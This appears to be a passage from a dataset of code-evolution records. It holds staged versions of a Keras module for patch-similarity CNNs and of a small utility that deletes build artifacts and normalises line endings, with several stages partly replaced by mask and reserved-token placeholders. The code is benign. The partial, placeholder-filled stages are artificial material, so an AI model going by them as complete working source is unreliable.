kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('relu'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n 
BatchNormalization()])\n\n\ndef create_dilated_cnn_receptive_field_25_with_tanh(input_shape,\n kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=5, kernel_regularizer=kernel_regularizer, dilation_rate\n =2), BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization(), Activation('tanh'), Conv2D(filters=32,\n kernel_size=3, kernel_regularizer=kernel_regularizer),\n BatchNormalization()])\n\n\ndef create_hartmann_cnn(input_shape, kernel_regularizer=None):\n return Sequential([Conv2D(filters=32, kernel_size=5, input_shape=\n input_shape), Activation('tanh'), MaxPooling2D(pool_size=(2, 2)),\n Conv2D(filters=64, kernel_size=5), Activation('tanh'), MaxPooling2D\n (pool_size=(2, 2))])\n\n\ndef cnn_factory(name):\n cnn_factories = {'simple_cnn': create_simple_cnn, 'simple_cnn_ln':\n create_simple_cnn_ln, 'dilated_cnn_receptive_field_25':\n create_dilated_cnn_receptive_field_25,\n 'dilated_cnn_receptive_field_25_with_tanh':\n create_dilated_cnn_receptive_field_25_with_tanh, 'hartmann_cnn':\n create_hartmann_cnn}\n return cnn_factories[name]\n\n\ndef optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):\n if optimizer == 'Adam':\n return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)\n elif optimizer == 'SGD':\n return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm, clipvalue=\n clipvalue)\n\n\ndef kernel_regularizer_factory(regularizer_factor):\n if regularizer_factor == 0.0:\n return None\n else:\n return regularizers.l2(regularizer_factor)\n\n\ndef build_simple_cnn(input_shape, create_cnn, optimizer='Adam', lr=0.001,\n momentum=None, clipnorm=0.0, loss='mse', reducer='average', merge_layer\n ='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n D, N, W, H, C = input_shape\n model = create_cnn(input_shape=(None, None, C), kernel_regularizer=\n weight_decay)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss))\n if weight_file:\n try:\n f = h5py.File(weight_file, 'r')\n keys = [os.path.join(model.name, w.name) for l in model.layers for\n w in l.weights]\n weights = [f[os.path.join('model_weights', k)][:] for k in keys]\n model.set_weights(weights)\n except:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef build_simple_nn_for_training(input_shape, create_cnn, optimizer='Adam',\n lr=0.001, momentum=None, clipnorm=0.0, loss='emd', reducer='average',\n merge_layer='dot-product', weight_decay=None, weight_file=None):\n assert len(input_shape) == 5\n input_shape = list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i] != None:\n input_shape[i] = int(input_shape[i])\n input_shape = tuple(input_shape)\n D, N, W, H, C = input_shape\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n cnn = create_cnn(input_shape=(W, H, C), 
kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n x = Dot(axes=-1, normalize=merge_layer == 'cosine-similarity')([x1, x2])\n x = TotalReshape((-1, D, N))(x)\n x = reducer_factory(reducer)(x)\n y = Activation('softmax')(x)\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss=loss_factory(loss), metrics=[\n 'accuracy', mae, mde])\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef build_hartmann_network(input_shape, create_cnn=create_hartmann_cnn,\n optimizer='SGD', lr=0.001, momentum=None, clipnorm=0.0, loss=None,\n reducer=None, merge_layer=None, weight_decay=None, weight_file=None):\n assert len(input_shape) == 3\n H, W, C = input_shape\n cnn = create_hartmann_cnn(input_shape=(None, None, C))\n sim = Sequential([Conv2D(filters=2048, kernel_size=5, input_shape=K.\n int_shape(cnn.output)[1:]), Activation('relu'), Conv2D(filters=2048,\n kernel_size=1), Activation('relu'), Conv2D(filters=2, kernel_size=1\n ), Activation('softmax')])\n x_in = [Input(shape=input_shape) for i in range(5)]\n x = [cnn(xi) for xi in x_in]\n x = KerasAverage()(x)\n y = sim(x)\n model = Model(inputs=x_in, outputs=y)\n model.compile(optimizer=optimizer_factory(optimizer, lr=lr, momentum=\n momentum, clipnorm=clipnorm), loss='categorical_crossentropy',\n metrics=['accuracy'])\n cnn.compile('sgd', 'mse')\n sim.compile('sgd', 'mse')\n model.cnn = cnn\n model.sim = sim\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n return model\n\n\ndef get_nn(name):\n models = {'simple_cnn': build_simple_cnn, 'simple_nn_for_training':\n build_simple_nn_for_training, 'hartmann': build_hartmann_network}\n return models[name]\n",
"step-5": "import os\n\nimport h5py\nimport numpy as np\n\nfrom keras import backend as K\nfrom keras.layers import Activation, BatchNormalization, Conv2D, Dense, Dot, \\\n Dropout, Flatten, Input, MaxPooling2D, GlobalAveragePooling2D\nfrom keras import regularizers\nfrom keras.layers import Average as KerasAverage\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, SGD\nfrom keras.engine.topology import Layer\n\nfrom .layers import LayerNormalization, CustomSoftmax\nfrom .tf_implementations.loss_functions import loss_factory\n\n\nclass TotalReshape(Layer):\n def __init__(self, target_shape, **kwargs):\n self.target_shape = target_shape\n super(TotalReshape, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return tuple(\n x if x != -1 else None\n for x in self.target_shape\n )\n\n def call(self, x):\n return K.reshape(x, self.target_shape)\n\n\nclass BaseReducer(Layer):\n def __init__(self, **kwargs):\n super(BaseReducer, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n return input_shape[:-1]\n\n\nclass Average(BaseReducer):\n def call(self, x):\n return K.mean(x, axis=-1)\n\n\nclass Max(BaseReducer):\n def call(self, x):\n return K.max(x, axis=-1)\n\n\nclass TopKAverage(BaseReducer):\n def __init__(self, k, **kwargs):\n self.k = k\n super(TopKAverage, self).__init__(**kwargs)\n\n def call(self, x):\n if K.backend() == \"tensorflow\":\n tf = K.tf\n x, _ = tf.nn.top_k(x, self.k, sorted=False)\n return K.mean(x, axis=-1)\n else:\n raise NotImplementedError(\"TopKAverage is not implemented for \"\n \" %s backend\" % (K.backend(),))\n\n\ndef reducer_factory(reducer, k=3):\n # Set the type of the reducer to be used\n if reducer == \"max\":\n return Max()\n elif reducer == \"average\":\n return Average()\n elif reducer == \"topK\":\n return TopKAverage(k)\n\n\ndef mae(y_true, y_pred):\n \"\"\" Implementation of Mean average error\n \"\"\"\n return K.mean(K.abs(y_true - y_pred))\n\n\ndef mde(y_true, y_pred):\n return K.mean(K.cast(\n K.abs(K.argmax(y_true, axis=1) - K.argmax(y_pred, axis=1)),\n K.floatx()\n ))\n\n\ndef create_simple_cnn(input_shape, kernel_regularizer=None):\n common_params = dict(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n )\n return Sequential([\n Conv2D(input_shape=input_shape, **common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n BatchNormalization()\n ])\n\n\ndef create_simple_cnn_ln(input_shape, kernel_regularizer=None):\n common_params = dict(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n )\n return Sequential([\n Conv2D(input_shape=input_shape, **common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization(),\n Activation(\"relu\"),\n Conv2D(**common_params),\n LayerNormalization()\n ])\n\n\ndef create_dilated_cnn_receptive_field_25(\n input_shape,\n kernel_regularizer=None\n):\n return Sequential([\n Conv2D(\n filters=32,\n kernel_size=5,\n input_shape=input_shape,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n 
filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer,\n dilation_rate=2\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer,\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"relu\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization()\n ])\n\n\ndef create_dilated_cnn_receptive_field_25_with_tanh(\n input_shape,\n kernel_regularizer=None\n):\n return Sequential([\n Conv2D(\n filters=32,\n kernel_size=5,\n input_shape=input_shape,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=5,\n kernel_regularizer=kernel_regularizer,\n dilation_rate=2\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer,\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization(),\n Activation(\"tanh\"),\n Conv2D(\n filters=32,\n kernel_size=3,\n kernel_regularizer=kernel_regularizer\n ),\n BatchNormalization()\n ])\n\n\ndef create_hartmann_cnn(input_shape, kernel_regularizer=None):\n return Sequential([\n Conv2D(filters=32, kernel_size=5, input_shape=input_shape),\n Activation(\"tanh\"),\n MaxPooling2D(pool_size=(2, 2)),\n Conv2D(filters=64, kernel_size=5),\n Activation(\"tanh\"),\n MaxPooling2D(pool_size=(2, 2))\n ])\n\n\ndef cnn_factory(name):\n cnn_factories = {\n \"simple_cnn\": create_simple_cnn,\n \"simple_cnn_ln\": create_simple_cnn_ln,\n \"dilated_cnn_receptive_field_25\":\n create_dilated_cnn_receptive_field_25,\n \"dilated_cnn_receptive_field_25_with_tanh\":\n create_dilated_cnn_receptive_field_25_with_tanh,\n \"hartmann_cnn\": create_hartmann_cnn\n }\n return cnn_factories[name]\n\n\ndef optimizer_factory(optimizer, lr, momentum=None, clipnorm=0.0, clipvalue=1):\n # Set the type of optimizer to be used\n if optimizer == \"Adam\":\n return Adam(lr=lr, clipnorm=clipnorm, clipvalue=clipvalue)\n elif optimizer == \"SGD\":\n return SGD(lr=lr, momentum=momentum, clipnorm=clipnorm,\n clipvalue=clipvalue)\n\n\ndef kernel_regularizer_factory(regularizer_factor):\n if regularizer_factor == 0.0:\n return None\n else:\n return regularizers.l2(regularizer_factor)\n\n\ndef build_simple_cnn(\n input_shape,\n create_cnn,\n optimizer=\"Adam\",\n lr=1e-3,\n momentum=None,\n clipnorm=0.0,\n loss=\"mse\",\n reducer=\"average\",\n merge_layer=\"dot-product\",\n weight_decay=None,\n weight_file=None\n):\n # Make sure that we have a proper input shape\n # TODO: Maybe change this to 3, because we finally need only the\n # patch_shape?\n assert len(input_shape) == 5\n\n # Unpack the input shape to make the code more readable\n D, N, W, H, C = input_shape\n\n model = 
create_cnn(\n input_shape=(None, None, C),\n kernel_regularizer=weight_decay\n )\n model.compile(\n optimizer=optimizer_factory(\n optimizer,\n lr=lr,\n momentum=momentum,\n clipnorm=clipnorm\n ),\n loss=loss_factory(loss)\n )\n\n # If there is a weight file specified load the weights\n if weight_file:\n try:\n f = h5py.File(weight_file, \"r\")\n keys = [os.path.join(model.name, w.name)\n for l in model.layers for w in l.weights]\n weights = [f[os.path.join(\"model_weights\", k)][:] for k in keys]\n\n model.set_weights(weights)\n except:\n model.load_weights(weight_file, by_name=True)\n\n return model\n\n\ndef build_simple_nn_for_training(\n input_shape,\n create_cnn,\n optimizer=\"Adam\",\n lr=1e-3,\n momentum=None,\n clipnorm=0.0,\n loss=\"emd\",\n reducer=\"average\",\n merge_layer=\"dot-product\",\n weight_decay=None,\n weight_file=None\n):\n # Make sure that we have a proper input shape\n assert len(input_shape) == 5\n\n # Unpack the input shape to make the code more readable\n # print(input_shape)\n input_shape=list(input_shape)\n for i in range(len(input_shape)):\n if input_shape[i]!=None:\n input_shape[i]=int(input_shape[i])\n input_shape=tuple(input_shape)\n D, N, W, H, C = input_shape\n\n # Create the two stream inputs\n x1_in = Input(shape=input_shape)\n x2_in = Input(shape=input_shape)\n\n # Reshape them for input in the CNN\n x1 = TotalReshape((-1, W, H, C))(x1_in)\n x2 = TotalReshape((-1, W, H, C))(x2_in)\n\n # Create the CNN and extract features from both streams\n cnn = create_cnn(input_shape=(W, H, C), kernel_regularizer=weight_decay)\n x1 = Flatten()(cnn(x1))\n x2 = Flatten()(cnn(x2))\n\n # Compute a kind of similarity between the features of the two streams\n x = Dot(axes=-1, normalize=(merge_layer == \"cosine-similarity\"))([x1, x2])\n\n # Reshape them back into their semantic shape (depth planes, patches, etc)\n x = TotalReshape((-1, D, N))(x)\n\n # Compute the final similarity scores for each depth plane\n x = reducer_factory(reducer)(x)\n\n # Compute the final output\n y = Activation(\"softmax\")(x)\n\n model = Model(inputs=[x1_in, x2_in], outputs=y)\n model.compile(\n optimizer=optimizer_factory(\n optimizer,\n lr=lr,\n momentum=momentum,\n clipnorm=clipnorm\n ),\n loss=loss_factory(loss),\n metrics=[\"accuracy\", mae, mde]\n )\n\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n\n return model\n\n\ndef build_hartmann_network(\n input_shape,\n create_cnn=create_hartmann_cnn,\n optimizer=\"SGD\",\n lr=1e-3,\n momentum=None,\n clipnorm=0.0,\n loss=None,\n reducer=None,\n merge_layer=None,\n weight_decay=None,\n weight_file=None\n):\n # Make sure that we have a proper input shape\n assert len(input_shape) == 3\n\n # Unpack the input shape to make the code more readable\n H, W, C = input_shape\n\n # Create the feature extracting CNN\n cnn = create_hartmann_cnn(input_shape=(None, None, C))\n\n # Create the similarity CNN\n sim = Sequential([\n Conv2D(\n filters=2048,\n kernel_size=5,\n input_shape=K.int_shape(cnn.output)[1:]\n ),\n Activation(\"relu\"),\n Conv2D(filters=2048, kernel_size=1),\n Activation(\"relu\"),\n Conv2D(filters=2, kernel_size=1),\n Activation(\"softmax\")\n ])\n\n # Create the joint model for training\n x_in = [Input(shape=input_shape) for i in range(5)]\n x = [cnn(xi) for xi in x_in]\n x = KerasAverage()(x)\n y = sim(x)\n model = Model(inputs=x_in, outputs=y)\n\n # Compile all the models\n model.compile(\n optimizer=optimizer_factory(\n optimizer,\n lr=lr,\n momentum=momentum,\n clipnorm=clipnorm\n ),\n 
loss=\"categorical_crossentropy\",\n metrics=[\"accuracy\"]\n )\n cnn.compile(\"sgd\", \"mse\") # Just so that we can run predict()\n sim.compile(\"sgd\", \"mse\")\n\n # Attach the cnn and sim to the model in case someone wants to use them\n model.cnn = cnn\n model.sim = sim\n\n if weight_file:\n model.load_weights(weight_file, by_name=True)\n\n return model\n\n\ndef get_nn(name):\n models = {\n \"simple_cnn\": build_simple_cnn,\n \"simple_nn_for_training\": build_simple_nn_for_training,\n \"hartmann\": build_hartmann_network\n }\n return models[name]\n",
"step-ids": [
17,
20,
24,
29,
31
]
}
|
[
17,
20,
24,
29,
31
] |
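
A brief usage sketch for the network factory quoted in the entry above. The input shapes mirror the assertions inside the builders; the concrete sizes, variable names and the CNN factory are assumptions made purely for illustration.

# Hypothetical example: obtain a builder by name and construct the Hartmann
# comparison network (the 128x128x3 patch size is assumed, not from the source).
builder = get_nn("hartmann")
model = builder(input_shape=(128, 128, 3), lr=1e-3)

# The two-stream training network instead expects a 5-tuple (D, N, W, H, C),
# e.g. 32 depth planes, 5 views and 11x11 RGB patches (values assumed):
# train_model = get_nn("simple_nn_for_training")(
#     (32, 5, 11, 11, 3), create_cnn=some_cnn_factory)
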
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=
'.*[.]git/.*', op='CR', fLOG=print):
"""
    Cleans ``\\r`` in files of a folder and its subfolders with the given extensions.
    Backslashes are replaced by ``/``. The regular expressions
    apply to the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
    The following cleaning operations are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, 'rb') as f:
content = f.read()
new_content = content.replace(b'\r\n', b'\n')
if new_content != content:
with open(name, 'wb') as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, 'rb') as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, 'wb') as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace('\\', '/')
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def clean_exts(folder='.', fLOG=print, exts=None, fclean=None):
"""
    Cleans files in a folder and its subfolders with the given extensions.
@param folder folder to clean
@param fLOG logging function
@param exts extensions to clean
@param fclean if not None, ``fclean(name) -> True`` to clean
@return list of removed files
If *exts* is None, it will be replaced by
``{".pyd", ".so", ".o", ".def", ".obj"}``.
"""
if exts is None:
exts = {'.pyd', '.so', '.o', '.def', '.obj'}
rem = []
for root, _, files in os.walk(folder):
for f in files:
ext = os.path.splitext(f)[-1]
if (ext in exts and 'exe.win' not in root and 'site-packages'
not in root and '_venv' not in root):
filename = os.path.join(root, f)
if fclean is not None and not fclean(filename):
continue
fLOG('[clean_exts] removing ', filename)
os.remove(filename)
rem.append(filename)
return rem
def clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=
'.*[.]git/.*', op='CR', fLOG=print):
"""
    Cleans ``\\r`` in files of a folder and its subfolders with the given extensions.
    Backslashes are replaced by ``/``. The regular expressions
    apply to the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
    The following cleaning operations are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, 'rb') as f:
content = f.read()
new_content = content.replace(b'\r\n', b'\n')
if new_content != content:
with open(name, 'wb') as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, 'rb') as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, 'wb') as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace('\\', '/')
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from __future__ import print_function
import os
import re
def clean_exts(folder='.', fLOG=print, exts=None, fclean=None):
"""
    Cleans files in a folder and its subfolders with the given extensions.
@param folder folder to clean
@param fLOG logging function
@param exts extensions to clean
@param fclean if not None, ``fclean(name) -> True`` to clean
@return list of removed files
If *exts* is None, it will be replaced by
``{".pyd", ".so", ".o", ".def", ".obj"}``.
"""
if exts is None:
exts = {'.pyd', '.so', '.o', '.def', '.obj'}
rem = []
for root, _, files in os.walk(folder):
for f in files:
ext = os.path.splitext(f)[-1]
if (ext in exts and 'exe.win' not in root and 'site-packages'
not in root and '_venv' not in root):
filename = os.path.join(root, f)
if fclean is not None and not fclean(filename):
continue
fLOG('[clean_exts] removing ', filename)
os.remove(filename)
rem.append(filename)
return rem
def clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=
'.*[.]git/.*', op='CR', fLOG=print):
"""
    Cleans ``\\r`` in files of a folder and its subfolders with the given extensions.
    Backslashes are replaced by ``/``. The regular expressions
    apply to the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
    The following cleaning operations are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, 'rb') as f:
content = f.read()
new_content = content.replace(b'\r\n', b'\n')
if new_content != content:
with open(name, 'wb') as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, 'rb') as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, 'wb') as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace('\\', '/')
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
<|reserved_special_token_1|>
"""
@file
@brief Various function to clean files.
"""
from __future__ import print_function
import os
import re
def clean_exts(folder=".", fLOG=print, exts=None, fclean=None):
"""
    Cleans files in a folder and its subfolders with the given extensions.
@param folder folder to clean
@param fLOG logging function
@param exts extensions to clean
@param fclean if not None, ``fclean(name) -> True`` to clean
@return list of removed files
If *exts* is None, it will be replaced by
``{".pyd", ".so", ".o", ".def", ".obj"}``.
"""
if exts is None:
exts = {".pyd", ".so", ".o", ".def", ".obj"}
rem = []
for root, _, files in os.walk(folder):
for f in files:
ext = os.path.splitext(f)[-1]
if (ext in exts and "exe.win" not in root and "site-packages" not in root and
"_venv" not in root): # pragma: no cover
filename = os.path.join(root, f)
if fclean is not None and not fclean(filename):
continue
fLOG("[clean_exts] removing ", filename)
os.remove(filename)
rem.append(filename)
return rem
def clean_files(folder=".", posreg='.*[.]((py)|(rst))$',
negreg=".*[.]git/.*", op="CR", fLOG=print):
"""
    Cleans ``\\r`` in files of a folder and its subfolders with the given extensions.
    Backslashes are replaced by ``/``. The regular expressions
    apply to the relative path starting from *folder*.
:param folder: folder to clean
:param posreg: regular expression to select files to process
:param negreg: regular expression to skip files to process
:param op: kind of cleaning to do, options are CR, CRB, pep8,
see below for more details
:param fLOG: logging function
:return: list of processed files
    The following cleaning operations are available:
* ``'CR'``: replaces ``'\\r\\n'`` by ``'\\n'``
* ``'CRB'``: replaces end of lines ``'\\n'`` by ``'\\r\\n'``
* ``'pep8'``: applies :epkg:`pep8` convention
"""
def clean_file_cr(name):
with open(name, "rb") as f:
content = f.read()
new_content = content.replace(b"\r\n", b"\n")
if new_content != content:
with open(name, "wb") as f:
f.write(new_content)
return True
return False
def clean_file_cr_back(name):
with open(name, "rb") as f:
lines = f.read().split(b'\n')
new_lines = []
changes = False
for li in lines:
if not li.endswith(b'\r'):
new_lines.append(li + b'\r')
changes = True
else:
new_lines.append(li)
if changes:
with open(name, "wb") as f:
f.write(b'\n'.join(new_lines))
return changes
if op == 'CR':
clean_file = clean_file_cr
elif op == 'CRB':
clean_file = clean_file_cr_back
elif op == 'pep8':
from .code_helper import remove_extra_spaces_and_pep8
clean_file = remove_extra_spaces_and_pep8
else:
raise ValueError(f"Unknown cleaning '{op}'.")
if posreg and isinstance(posreg, str):
posreg = re.compile(posreg)
if negreg and isinstance(negreg, str):
negreg = re.compile(negreg)
res = []
for root, _, files in os.walk(folder):
for f in files:
full = os.path.join(root, f)
rel = os.path.relpath(full, folder)
fn = rel.replace("\\", "/")
if posreg is None or posreg.search(fn):
if negreg is None or not negreg.search(fn):
r = clean_file(full)
if r and fLOG:
fLOG(f"[clean_files] processed '{fn}'")
res.append(rel)
return res
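
A minimal usage sketch for the two helpers above. The import path and folder names are assumptions shown only for illustration.

# Hypothetical example: drop compiled artifacts, then normalise line endings
# of the Python files in a checkout (the module path "clean_folder" is assumed).
from clean_folder import clean_exts, clean_files

removed = clean_exts(folder="myproject")
processed = clean_files(folder="myproject", posreg=r'.*[.]py$', op="CR")
print(f"{len(removed)} files removed, {len(processed)} files rewritten")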
|
flexible
|
{
"blob_id": "57972e6368aa5749edeab94e45d84f7897ca14ab",
"index": 8751,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef clean_files(folder='.', posreg='.*[.]((py)|(rst))$', negreg=\n '.*[.]git/.*', op='CR', fLOG=print):\n \"\"\"\n Cleans ``\\\\r`` in files a folder and subfolders with a given extensions.\n Backslashes are replaces by ``/``. The regular expressions\n applies on the relative path starting from *folder*.\n\n :param folder: folder to clean\n :param posreg: regular expression to select files to process\n :param negreg: regular expression to skip files to process\n :param op: kind of cleaning to do, options are CR, CRB, pep8,\n see below for more details\n :param fLOG: logging function\n :return: list of processed files\n\n The following cleaning are available:\n\n * ``'CR'``: replaces ``'\\\\r\\\\n'`` by ``'\\\\n'``\n * ``'CRB'``: replaces end of lines ``'\\\\n'`` by ``'\\\\r\\\\n'``\n * ``'pep8'``: applies :epkg:`pep8` convention\n \"\"\"\n\n def clean_file_cr(name):\n with open(name, 'rb') as f:\n content = f.read()\n new_content = content.replace(b'\\r\\n', b'\\n')\n if new_content != content:\n with open(name, 'wb') as f:\n f.write(new_content)\n return True\n return False\n\n def clean_file_cr_back(name):\n with open(name, 'rb') as f:\n lines = f.read().split(b'\\n')\n new_lines = []\n changes = False\n for li in lines:\n if not li.endswith(b'\\r'):\n new_lines.append(li + b'\\r')\n changes = True\n else:\n new_lines.append(li)\n if changes:\n with open(name, 'wb') as f:\n f.write(b'\\n'.join(new_lines))\n return changes\n if op == 'CR':\n clean_file = clean_file_cr\n elif op == 